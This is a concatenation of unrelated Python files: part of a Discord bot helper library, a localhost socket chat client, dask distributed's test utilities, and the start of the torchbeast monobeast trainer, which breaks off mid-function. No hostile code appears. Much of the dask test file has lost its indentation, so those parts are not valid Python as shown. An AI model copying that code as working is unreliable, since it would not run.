        self.shard_id: Optional[int] = None
        self.headers = {
            'User-Agent': __agent__,
            'Content-Type': 'application/json',
            'Authorization': self.token
        }
    @TaskPlus.execute
    def post(self):
        """Send the current guild count (plus shard info, if set) to the top.gg stats API."""
        payload = {'server_count': len(self.bot.guilds)}
        if self.shard_count is not None:
            payload["shard_count"] = self.shard_count
        if self.shard_id is not None:
            payload["shard_id"] = self.shard_id
        return post('https://top.gg/api/bots/stats', data=json.dumps(payload), headers=self.headers)
class CommandErrorHandlerCog(CogPlus):
    """Cog that converts uncaught command/slash-command exceptions into localized replies."""
    def get_translation(self, ctx) -> Translation:
        """Return the translation bundle used to localize error messages.

        May be replaced at runtime (see CogLib.activate_command_error_handler);
        `ctx` is accepted so overrides can localize per guild/user.
        """
        return Translation(self.bot, 'Errors')
    async def _handle(self, ctx, exception: Exception):
        """Send `exception` to the user, wrapping unexpected errors uniformly.

        Extracted to remove the duplicated body the two listeners shared.
        """
        translation = self.get_translation(ctx)
        if isinstance(exception, InteractionError):
            await exception.send(self.bot, ctx, translation)
        else:
            await UnexpectedError(exception).send(self.bot, ctx, translation)
    @CogPlus.listener()
    async def on_slash_command_error(self, ctx: SlashContext, exception: Exception):
        await self._handle(ctx, exception)
    @CogPlus.listener()
    async def on_command_error(self, ctx: Context, exception: Exception):
        await self._handle(ctx, exception)
class CogLib:
    """Facade for enabling/disabling the library's optional components on a bot."""
    def __init__(self, bot: BotPlus):
        self.bot = bot
        self._TopGGTask = None  # running TopGGPoster task, if activated
        self._CEH = None        # installed CommandErrorHandlerCog, if activated
    def activate_api(self, import_name, host=None, port=None, vote_auth=None):
        """Create, register and start the Flask API cog; returns it."""
        self.bot.api = API(self.bot, import_name)
        self.bot.add_cog(self.bot.api)
        self.bot.api.set_auth(vote_auth)
        self.bot.api.run(host=host, port=port)
        return self.bot.api
    def activate_topgg_poster(self, token: str, timer: float = 1800):
        """Start the periodic top.gg stats poster; returns the task."""
        self._TopGGTask = TopGGPoster(self.bot, token, timer)
        self._TopGGTask.start()
        return self._TopGGTask
    def activate_command_error_handler(self, translation_method: Callable[[CogPlus, Union[Context, SlashContext]], Translation] = None):
        """Install (or reinstall) the error-handler cog, optionally with a custom translator."""
        if self._CEH:
            self.bot.remove_cog(self._CEH.qualified_name)
        self._CEH = CommandErrorHandlerCog(self.bot)
        if translation_method is not None:
            self._CEH.get_translation = translation_method
        self.bot.add_cog(self._CEH)
    def disable_command_error_handler(self):
        """Remove the error-handler cog if installed (no-op otherwise)."""
        if self._CEH:
            self.bot.remove_cog(self._CEH.qualified_name)
            self._CEH = None
    def disable_topgg_poster(self):
        """Stop the top.gg poster if running (no-op otherwise).

        Fix: the original called self._TopGGTask.stop() unconditionally,
        raising AttributeError when the poster was never activated, and never
        reset the reference (its _CEH sibling does both).
        """
        if self._TopGGTask:
            self._TopGGTask.stop()
            self._TopGGTask = None
|
Client2.py | import socket
import threading
from queue import Queue
NUMBER_OF_THREAD = 2  # one worker thread per job: sender and receiver
JOBS = [1, 2]  # job ids consumed by work(): 1 = send loop, 2 = receive loop
queue = Queue()  # distributes the job ids to the worker threads
s = socket.socket()  # client connection shared by the send and receive loops
host = '127.0.0.1' #write host server IP
port = 5000
s.connect((host, port))
def send_message():
    """Read lines from stdin and send them to the server until input or the
    socket fails."""
    while True:
        # Narrowed from a bare `except:` (which also swallowed
        # KeyboardInterrupt/SystemExit) to the failures that can actually
        # occur here: closed stdin and socket errors.
        try:
            message = input("Client: ")
            # Fix idiom: encode the string directly instead of the unbound
            # `str.encode(message, 'utf-8')` form (same bytes produced).
            s.send(message.encode('utf-8'))
        except (EOFError, OSError):
            print("error in sending ")
            break
def recv_message():
    """Print messages from the server until the connection errors or closes."""
    while True:
        try:
            data = s.recv(20480)
        except OSError:
            # Narrowed from a bare `except:` to socket errors only.
            print("error in receiving")
            break
        if not data:
            # Fix: recv() returning b'' means the server closed the
            # connection; the original looped forever printing blank lines.
            print("error in receiving")
            break
        print("\n" + str(data, 'utf-8'))
def create_workers():
    """Spawn NUMBER_OF_THREAD daemon worker threads that pull jobs off the queue."""
    workers = [threading.Thread(target=work) for _ in range(NUMBER_OF_THREAD)]
    for worker in workers:
        worker.daemon = True
        worker.start()
def work():
    """Worker loop: dispatch queued job ids (1 -> sender loop, 2 -> receiver loop)."""
    handlers = {1: send_message, 2: recv_message}
    while True:
        job = queue.get()
        handler = handlers.get(job)
        if handler is not None:
            handler()
        queue.task_done()
def create_jobs():
    """Enqueue one job id per worker role, then block until all are done."""
    for job in JOBS:
        queue.put(job)
    queue.join()
# Start the worker threads, then enqueue both job ids and wait on queue.join().
create_workers()
create_jobs()
test_utils_test.py | import asyncio
import os
import pathlib
import signal
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
import yaml
from tornado import gen
import dask.config
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.compatibility import WINDOWS
from distributed.core import Server, rpc
from distributed.metrics import time
from distributed.utils import mp_context
from distributed.utils_test import (
_LockedCommPool,
_UnhashableCallable,
assert_worker_story,
check_process_leak,
cluster,
dump_cluster_state,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.xfail(
reason="Test should always fail to ensure the body of the test function was run",
strict=True,
)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
assert False
@pytest.mark.parametrize("foo", [True])
@gen_test()
async def test_gen_test_parametrized(foo):
assert foo is True
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", [False])
@gen_test()
async def test_gen_test_double_parametrized(foo, bar):
assert foo is True
assert bar is False
@gen_test()
async def test_gen_test_pytest_fixture(tmp_path, c):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
@contextmanager
def _listen(delay=0):
    """Yield a bound (not yet listening) server socket on an ephemeral port.

    A background daemon thread waits `delay` seconds, then starts listening,
    accepts a single connection, closes it, and closes the socket. The
    Event/sleep handshake below ensures the thread is running before the
    caller's body executes; the finally-join bounds teardown at 5 s.
    """
    serv = socket.socket()
    serv.bind(("127.0.0.1", 0))
    e = threading.Event()
    def do_listen():
        e.set()
        sleep(delay)
        serv.listen(5)
        ret = serv.accept()
        if ret is not None:
            cli, _ = ret
            cli.close()
        serv.close()
    t = threading.Thread(target=do_listen)
    t.daemon = True
    t.start()
    try:
        e.wait()
        sleep(0.01)
        yield serv
    finally:
        t.join(5.0)
def test_new_config():
    """new_config() must apply overrides inside the context and restore fully after."""
    c = config.copy()
    with new_config({"xyzzy": 5}):
        # Fix: this was a bare comparison expression (`config["xyzzy"] == 5`)
        # whose result was discarded — the test asserted nothing inside the
        # context manager.
        assert config["xyzzy"] == 5
    assert config == c
    assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
    """A TLS-secured client can round-trip a simple task."""
    # Fix: this was a bare comparison expression whose result was discarded —
    # the submit result was never actually checked.
    assert tls_client.submit(lambda x: x + 1, 10).result() == 11
    assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
def test__UnhashableCallable():
func = _UnhashableCallable()
assert func(1) == 2
with pytest.raises(TypeError, match="unhashable"):
hash(func)
class MyServer(Server):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.handlers["ping"] = self.pong
self.counter = 0
def pong(self, comm):
self.counter += 1
return "pong"
@pytest.mark.asyncio
async def test_locked_comm_drop_in_replacement(loop):
a = await MyServer({})
await a.listen(0)
read_event = asyncio.Event()
read_event.set()
read_queue = asyncio.Queue()
original_pool = a.rpc
a.rpc = _LockedCommPool(original_pool, read_event=read_event, read_queue=read_queue)
b = await MyServer({})
await b.listen(0)
# Event is set, the pool works like an ordinary pool
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
assert res == "pong"
assert b.counter == 1
read_event.clear()
# Can also be used without a lock to intercept network traffic
a.rpc = _LockedCommPool(original_pool, read_queue=read_queue)
a.rpc.remove(b.address)
res = await a.rpc(b.address).ping()
assert await read_queue.get() == (b.address, "pong")
@pytest.mark.asyncio
async def test_locked_comm_intercept_read(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
read_event = asyncio.Event()
read_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, read_event=read_event, read_queue=read_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
# We didn't block the write but merely the read. The remove should have
# received the message and responded already
while not b.counter:
await asyncio.sleep(0.001)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
assert await read_queue.get() == (b.address, "pong")
read_event.set()
assert await fut == "pong"
@pytest.mark.asyncio
async def test_locked_comm_intercept_write(loop):
a = await MyServer({})
await a.listen(0)
b = await MyServer({})
await b.listen(0)
write_event = asyncio.Event()
write_queue = asyncio.Queue()
a.rpc = _LockedCommPool(a.rpc, write_event=write_event, write_queue=write_queue)
async def ping_pong():
return await a.rpc(b.address).ping()
fut = asyncio.create_task(ping_pong())
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(asyncio.shield(fut), 0.01)
# Write was blocked. The remote hasn't received the message, yet
assert b.counter == 0
assert await write_queue.get() == (b.address, {"op": "ping", "reply": True})
write_event.set()
assert await fut == "pong"
@pytest.mark.slow()
def test_dump_cluster_state_timeout(tmp_path):
    """A gen_cluster-wrapped test that times out must dump the cluster state to disk."""
    sleep_time = 30

    async def inner_test(c, s, a, b):
        await asyncio.sleep(sleep_time)

    # This timeout includes cluster startup and teardown which sometimes can
    # take a significant amount of time. For this particular test we would like
    # to keep the _test timeout_ small because we intend to trigger it but the
    # overall timeout large.
    test = gen_cluster(client=True, timeout=5, cluster_dump_directory=tmp_path)(
        inner_test
    )
    try:
        with pytest.raises(asyncio.TimeoutError) as exc:
            test()
        assert "inner_test" in str(exc)
        assert "await asyncio.sleep(sleep_time)" in str(exc)
    except gen.TimeoutError:
        pytest.xfail("Cluster startup or teardown took too long")

    _, dirs, files = next(os.walk(tmp_path))
    assert not dirs
    assert files == [inner_test.__name__ + ".yaml"]
    # Fix: dropped the redundant local `import yaml` — yaml is already
    # imported at module level.
    with open(tmp_path / files[0], "rb") as fd:
        state = yaml.load(fd, Loader=yaml.Loader)

    assert "scheduler" in state
    assert "workers" in state
def test_assert_worker_story():
now = time()
story = [
("foo", "id1", now - 600),
("bar", "id2", now),
("baz", {1: 2}, "id2", now),
]
# strict=False
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})])
assert_worker_story(story, [])
assert_worker_story(story, [("foo",)])
assert_worker_story(story, [("foo",), ("bar",)])
assert_worker_story(story, [("baz", lambda d: d[1] == 2)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo", "nomatch")])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", {1: 3})])
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",), ("baz", "extra"), ("+1",)])
with pytest.raises(AssertionError):
assert_worker_story(story, [("baz", lambda d: d[1] == 3)])
with pytest.raises(KeyError): # Faulty lambda
assert_worker_story(story, [("baz", lambda d: d[2] == 1)])
assert_worker_story([], [])
assert_worker_story([("foo", "id1", now)], [("foo",)])
with pytest.raises(AssertionError):
assert_worker_story([], [("foo",)])
# strict=True
assert_worker_story([], [], strict=True)
assert_worker_story([("foo", "id1", now)], [("foo",)])
assert_worker_story(story, [("foo",), ("bar",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("bar",)], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [("foo",), ("baz", {1: 2})], strict=True)
with pytest.raises(AssertionError):
assert_worker_story(story, [], strict=True)
@pytest.mark.parametrize(
    "story",
    [
        [()],  # Missing payload, stimulus_id, ts
        [("foo",)],  # Missing (stimulus_id, ts)
        [("foo", "bar")],  # Missing ts
        [("foo", "bar", "baz")],  # ts is not a float
        [("foo", "bar", time() + 3600)],  # ts is in the future
        [("foo", "bar", time() - 7200)],  # ts is too old
        [("foo", 123, time())],  # stimulus_id is not a string
        [("foo", "", time())],  # stimulus_id is an empty string
        [("", time())],  # no payload
        [("foo", "id", time()), ("foo", "id", time() - 10)],  # timestamps out of order
    ],
)
def test_assert_worker_story_malformed_story(story):
    """Every malformed story above must be rejected with 'Malformed story event'."""
    with pytest.raises(AssertionError, match="Malformed story event"):
        assert_worker_story(story, [])
@gen_cluster()
async def test_dump_cluster_state(s, a, b, tmpdir):
    # Dump scheduler + two in-process workers to YAML and check the top-level keys.
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"].keys() == {a.address, b.address}
@gen_cluster(nthreads=[])
async def test_dump_cluster_state_no_workers(s, tmpdir):
    # A cluster with zero workers still dumps cleanly; "workers" is just empty.
    await dump_cluster_state(s, [], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"] == {}
@gen_cluster(Worker=Nanny)
async def test_dump_cluster_state_nannies(s, a, b, tmpdir):
    # With Nanny-wrapped workers the dumped worker keys must match the
    # scheduler's view of the cluster (worker addresses, not nanny addresses).
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert out["workers"].keys() == s.workers.keys()
@gen_cluster()
async def test_dump_cluster_state_unresponsive_local_worker(s, a, b, tmpdir):
    # Stop worker a's server before dumping; the dump must still succeed and
    # both workers must still be reported as dicts (not error strings).
    a.stop()
    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert isinstance(out["workers"][a.address], dict)
    assert isinstance(out["workers"][b.address], dict)
@pytest.mark.slow
@gen_cluster(
    client=True,
    Worker=Nanny,
    config={"distributed.comm.timeouts.connect": "600ms"},
)
async def test_dump_cluster_unresponsive_remote_worker(c, s, a, b, tmpdir):
    # Make worker a unresponsive by running a task on it that stops its
    # server, then dump. Worker b dumps normally; a's entry degrades to the
    # connect-timeout error string instead of a dict.
    clog_fut = asyncio.create_task(
        c.run(lambda dask_scheduler: dask_scheduler.stop(), workers=[a.worker_address])
    )
    await asyncio.sleep(0.2)  # give the clogging task time to land on the worker

    await dump_cluster_state(s, [a, b], str(tmpdir), "dump")
    with open(f"{tmpdir}/dump.yaml") as fh:
        out = yaml.safe_load(fh)

    assert out.keys() == {"scheduler", "workers", "versions"}
    assert isinstance(out["workers"][b.worker_address], dict)
    assert out["workers"][a.worker_address].startswith(
        "OSError('Timed out trying to connect to"
    )

    clog_fut.cancel()
def garbage_process(barrier, ignore_sigterm: bool = False, t: float = 3600) -> None:
    """Child-process target: optionally ignore termination signals, sync with
    the parent via *barrier*, then idle for *t* seconds."""
    if ignore_sigterm:
        for sig in (signal.SIGTERM, signal.SIGHUP, signal.SIGINT):
            signal.signal(sig, signal.SIG_IGN)
    barrier.wait()
    sleep(t)
def test_check_process_leak():
    """With check=True, a child that outlives the context must raise and
    then be killed on the way out."""
    barrier = mp_context.Barrier(parties=2)
    with pytest.raises(AssertionError):
        with check_process_leak(check=True, check_timeout=0.01):
            leaked = mp_context.Process(target=garbage_process, args=(barrier,))
            leaked.start()
            barrier.wait()
    assert not leaked.is_alive()
def test_check_process_leak_slow_cleanup():
    """check_process_leak waits a bit for processes to terminate themselves"""
    barrier = mp_context.Barrier(parties=2)
    with check_process_leak(check=True):
        child = mp_context.Process(target=garbage_process, args=(barrier, False, 0.2))
        child.start()
        barrier.wait()
        # child exits on its own after ~0.2s; the context should tolerate that
    assert not child.is_alive()
@pytest.mark.parametrize(
    "ignore_sigterm",
    [False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_pre_cleanup(ignore_sigterm):
    # A process already leaked BEFORE entering the context manager must be
    # reaped on enter — even one that ignores SIGTERM (escalated to SIGKILL;
    # skipped on Windows which has no SIGKILL).
    barrier = mp_context.Barrier(parties=2)
    p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
    p.start()
    barrier.wait()

    with check_process_leak(term_timeout=0.2):
        assert not p.is_alive()
@pytest.mark.parametrize(
    "ignore_sigterm",
    [False, pytest.param(True, marks=pytest.mark.skipif(WINDOWS, reason="no SIGKILL"))],
)
def test_check_process_leak_post_cleanup(ignore_sigterm):
    # With check=False the context does not fail on leaked children, but it
    # must still terminate them on exit.
    barrier = mp_context.Barrier(parties=2)
    with check_process_leak(check=False, term_timeout=0.2):
        p = mp_context.Process(target=garbage_process, args=(barrier, ignore_sigterm))
        p.start()
        barrier.wait()
    assert not p.is_alive()
|
monobeast.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
#import wandb
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
import numpy as np
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")

parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
                    help="Gym environment.")
parser.add_argument("--mode", default="train",
                    choices=["train", "test", "test_render", "eval"],
                    help="Training or test mode.")
parser.add_argument("--xpid", default=None,
                    help="Experiment id (default: None).")
parser.add_argument("--num_episodes", type=int, default=10,
                    help="Num eval episodes.")
parser.add_argument("--pretrained", default=None, type=str,
                    help="Whether or not to use a pretrained featurizer.")

# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
                    help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
                    help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
                    help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
                    help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
                    help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
                    help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
                    metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
                    metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
                    help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
                    help="Use LSTM in agent model.")
parser.add_argument("--num_layers", default=1, type=int,
                    help="Number hidden layers.")
parser.add_argument("--hidden_size", default=512, type=int,
                    help="Dim of model activations.")

# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
                    type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
                    type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
                    type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
                    choices=["abs_one", "none"],
                    help="Reward clipping.")

# Optimizer settings. RMSProp is used by train(); the Adam betas below are
# only consumed if the commented-out Adam optimizer is re-enabled.
parser.add_argument("--learning_rate", default=0.00048,
                    type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
                    help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
                    help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.0001, type=float,
                    help="RMSProp epsilon.")
parser.add_argument("--beta1", default=0.9, type=float,
                    help="Adam beta1.")
parser.add_argument("--beta2", default=0.999, type=float,
                    help="Adam beta2.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
                    help="Global gradient norm clip.")
# yapf: enable

# Proxy settings: reward-shaping knobs passed through to the env wrappers.
parser.add_argument("--fuel_multiplier", default=1.0, type=float,
                    help="How much to increase the score of shooting a fuel cannister to be.")
parser.add_argument("--move_penalty", default=0.0, type=float,
                    help="How much to penalize moving")
parser.add_argument("--true_move_penalty", default=0.0, type=float,
                    help="How much to truely penalize moving")
logging.basicConfig(
    format=(
        "[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
    ),
    level=0,  # level 0 passes every record through to the root handler
)

# A rollout buffer set: maps field name -> one shared-memory tensor per slot.
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
    """Baseline (value-function) loss: half of the summed squared advantages."""
    squared = torch.square(advantages)
    return squared.sum() / 2
def compute_entropy_loss(logits):
    """Return the entropy loss, i.e., the negative entropy of the policy."""
    probs = F.softmax(logits, dim=-1)
    log_probs = F.log_softmax(logits, dim=-1)
    return (probs * log_probs).sum()
def compute_policy_gradient_loss(logits, actions, advantages):
    """Advantage-weighted cross-entropy (policy-gradient) loss.

    logits: [T, B, num_actions]; actions/advantages: [T, B]. The advantages
    are detached so gradients only flow through the policy logits.
    """
    flat_logits = torch.flatten(logits, 0, 1)
    flat_actions = torch.flatten(actions, 0, 1)
    cross_entropy = F.nll_loss(
        F.log_softmax(flat_logits, dim=-1),
        target=flat_actions,
        reduction="none",
    ).view_as(advantages)
    return torch.sum(cross_entropy * advantages.detach())
def act(
    flags,
    actor_index: int,
    free_queue: mp.SimpleQueue,
    full_queue: mp.SimpleQueue,
    model: torch.nn.Module,
    buffers: Buffers,
    initial_agent_state_buffers,
):
    """Actor-process loop: roll out the shared-memory model in its own env.

    Repeatedly takes a free buffer index from free_queue, writes an
    unroll_length rollout (plus the carried-over last step) into the shared
    buffers, then hands the index to the learner via full_queue. A None on
    free_queue is the shutdown signal.
    """
    try:
        logging.info("Actor %i started.", actor_index)
        timings = prof.Timings()  # Keep track of how fast things are.

        if flags.pretrained:
            gym_env = create_env_seaquest(flags)
        else:
            gym_env = create_env(flags)
        # Per-actor seed derived from os.urandom so actors don't correlate.
        seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
        gym_env.seed(seed)
        env = environment.Environment(gym_env)
        env_output = env.initial()
        agent_state = model.initial_state(batch_size=1)
        agent_output, unused_state = model(env_output, agent_state)
        while True:
            index = free_queue.get()
            if index is None:  # shutdown signal from train()
                break

            # Write old rollout end: slot 0 carries the previous rollout's
            # final step so the learner sees T+1 contiguous steps.
            for key in env_output:
                buffers[key][index][0, ...] = env_output[key]
            for key in agent_output:
                buffers[key][index][0, ...] = agent_output[key]
            for i, tensor in enumerate(agent_state):
                initial_agent_state_buffers[index][i][...] = tensor

            # Do new rollout.
            for t in range(flags.unroll_length):
                timings.reset()

                with torch.no_grad():  # inference only; learner owns gradients
                    agent_output, agent_state = model(env_output, agent_state)

                timings.time("model")

                env_output = env.step(agent_output["action"])

                timings.time("step")

                for key in env_output:
                    buffers[key][index][t + 1, ...] = env_output[key]
                for key in agent_output:
                    buffers[key][index][t + 1, ...] = agent_output[key]

                timings.time("write")
            full_queue.put(index)

        if actor_index == 0:
            logging.info("Actor %i: %s", actor_index, timings.summary())

    except KeyboardInterrupt:
        pass  # Return silently.
    except Exception as e:
        logging.error("Exception in worker process %i", actor_index)
        traceback.print_exc()
        print()
        raise e
def get_batch(
    flags,
    free_queue: mp.SimpleQueue,
    full_queue: mp.SimpleQueue,
    buffers: Buffers,
    initial_agent_state_buffers,
    timings,
    lock=threading.Lock(),  # deliberate: one shared lock across all learner threads
):
    """Assemble one learner batch from filled rollout buffers.

    Dequeues batch_size buffer indices (under the shared lock so learner
    threads don't interleave partial batches), stacks each buffer field along
    a new batch dimension, returns the indices to free_queue, and moves
    everything to flags.device.

    Returns:
        (batch dict of [T+1, B, ...] tensors, tuple of initial agent states).
    """
    with lock:
        timings.time("lock")
        indices = [full_queue.get() for _ in range(flags.batch_size)]
        timings.time("dequeue")
    # dim=1 is the new batch dimension; dim 0 stays time.
    batch = {
        key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
    }
    initial_agent_state = (
        torch.cat(ts, dim=1)
        for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
    )
    timings.time("batch")
    # Buffers are copied above, so the slots can be recycled immediately.
    for m in indices:
        free_queue.put(m)
    timings.time("enqueue")
    batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
    initial_agent_state = tuple(
        t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
    )
    timings.time("device")
    return batch, initial_agent_state
def learn(
    flags,
    actor_model,
    model,
    batch,
    initial_agent_state,
    optimizer,
    scheduler,
    lock=threading.Lock(),  # noqa: B008  deliberate shared lock across threads
):
    """Performs a learning (optimization) step.

    Runs the learner model over a batch, computes the v-trace losses,
    applies one optimizer/scheduler step, and pushes the updated weights
    back into the shared-memory actor_model. Returns a stats dict.
    """
    with lock:
        learner_outputs, unused_state = model(batch, initial_agent_state)

        # Take final value function slice for bootstrapping.
        bootstrap_value = learner_outputs["baseline"][-1]

        # Move from obs[t] -> action[t] to action[t] -> obs[t].
        batch = {key: tensor[1:] for key, tensor in batch.items()}
        learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}

        rewards = batch["reward"]
        # argparse restricts reward_clipping to exactly these two choices.
        if flags.reward_clipping == "abs_one":
            clipped_rewards = torch.clamp(rewards, -1, 1)
        elif flags.reward_clipping == "none":
            clipped_rewards = rewards

        # Zero the discount at episode boundaries.
        discounts = (~batch["done"]).float() * flags.discounting

